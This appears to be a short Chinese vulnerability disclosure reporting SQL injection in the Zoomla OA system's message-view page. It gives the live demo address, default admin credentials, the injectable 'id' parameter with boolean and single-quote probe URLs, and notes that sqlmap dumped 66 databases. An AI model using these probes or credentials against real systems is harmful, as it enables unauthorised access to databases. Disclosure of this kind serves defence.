### 简要描述:
这个能算通用吗。。 没什么技术含量
### 详细说明:
官网演示地址:http://oa.zoomla.cn/
使用admin admin888登陆
注入点http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1
没有经过任何限制,直接可以注入 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 and 1=1返回正常
http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 and 1=2 返回空白
http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1' 报错
利用sqlmap可以跑 66个库
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201407/181422481812cb7c2e91fcd4cb13c7f5c7cacaa5.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/181422481812cb7c2e91fcd4cb13c7f5c7cacaa5.png)
暂无评论